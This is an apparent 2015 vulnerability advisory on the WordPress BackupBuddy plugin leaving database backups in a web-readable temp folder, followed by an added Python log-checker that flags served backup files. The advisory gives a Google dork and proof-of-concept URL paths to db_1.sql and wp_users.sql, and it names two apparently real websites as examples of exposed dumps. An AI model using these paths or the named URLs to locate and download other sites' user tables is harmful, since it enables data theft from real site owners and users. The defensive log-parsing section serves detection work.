# WordPress 'BackupBuddy' Plugin Exposure of Backup Files to Unauthorized Control Sphere
# CWE: CWE-530
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.org
# Date: 15/05/2015
# Vendor Homepage: https://ithemes.com/purchase/backupbuddy/
# Google Dork: inurl:/wp-content/uploads/backupbuddy_temp/
# PoC:
http://SITE.COM/wp-content/uploads/backupbuddy_temp/"RANDOM NAME"/db_1.sql
OR
http://SITE.COM/wp-content/uploads/backupbuddy_temp/"RANDOM NAME"/wp_users.sql
# Examples:
http://intouchhome.com/wp-content/uploads/backupbuddy_temp/rollback_nwb0cpc4r6/wp_users.sql
http://www.article2range.com/wp-content/uploads/backupbuddy_temp/61fmr70xk7/db_1.sql
And Others...
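A defender-side check, added here as an example and not part of the advisory: it parses web-server access log lines (constructed sample lines in combined log format, not real traffic) for requests into the backupbuddy_temp directory and reports which .sql backup files or directory listings were actually served with a 2xx status. The function names and sample IPs are my own assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format); not taken from any real site.
SAMPLE_LOG = """\
203.0.113.7 - - [15/May/2015:10:01:12 +0000] "GET /wp-content/uploads/backupbuddy_temp/rollback_abc123/wp_users.sql HTTP/1.1" 200 48211 "-" "Mozilla/5.0"
203.0.113.7 - - [15/May/2015:10:01:15 +0000] "GET /wp-content/uploads/backupbuddy_temp/abc123/db_1.sql HTTP/1.1" 403 199 "-" "Mozilla/5.0"
198.51.100.2 - - [15/May/2015:10:02:00 +0000] "GET /wp-content/uploads/2015/05/photo.jpg HTTP/1.1" 200 10240 "-" "Mozilla/5.0"
203.0.113.9 - - [15/May/2015:10:03:44 +0000] "GET /wp-content/uploads/backupbuddy_temp/ HTTP/1.1" 200 1450 "-" "curl/7.35"
"""

# Combined log format: ip ident user [timestamp] "METHOD path protocol" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
TEMP_DIR = "/wp-content/uploads/backupbuddy_temp/"


def classify_request(path):
    """Return 'backup_file', 'dir_listing', 'other_temp' or None for a request path."""
    clean = unquote(path.split("?", 1)[0]).lower()  # drop query string, decode %XX
    if not clean.startswith(TEMP_DIR):
        return None
    if clean.endswith(".sql"):          # db_1.sql, wp_users.sql and similar dumps
        return "backup_file"
    if clean.endswith("/"):             # directory index of the temp folder
        return "dir_listing"
    return "other_temp"


def find_exposures(log_text):
    """One finding per request into the BackupBuddy temp directory.
    served=True means the server answered 2xx, i.e. the content actually left the host."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed or non-combined-format line; skip
        kind = classify_request(m["path"])
        if kind is None:
            continue
        status = int(m["status"])
        findings.append({"ip": m["ip"], "ts": m["ts"], "path": m["path"], "kind": kind,
                         "status": status, "served": 200 <= status < 300})
    return findings


if __name__ == "__main__":
    for f in find_exposures(SAMPLE_LOG):
        verdict = "LEAKED" if f["served"] else "blocked"
        print(f'{verdict:7} {f["ip"]:15} {f["status"]} {f["kind"]:12} {f["path"]}')
```

A "LEAKED" line for a backup_file means the dump was downloadable at that moment; the fix is to deny web access to the backupbuddy_temp directory and remove leftover dumps, then confirm further requests log as 403.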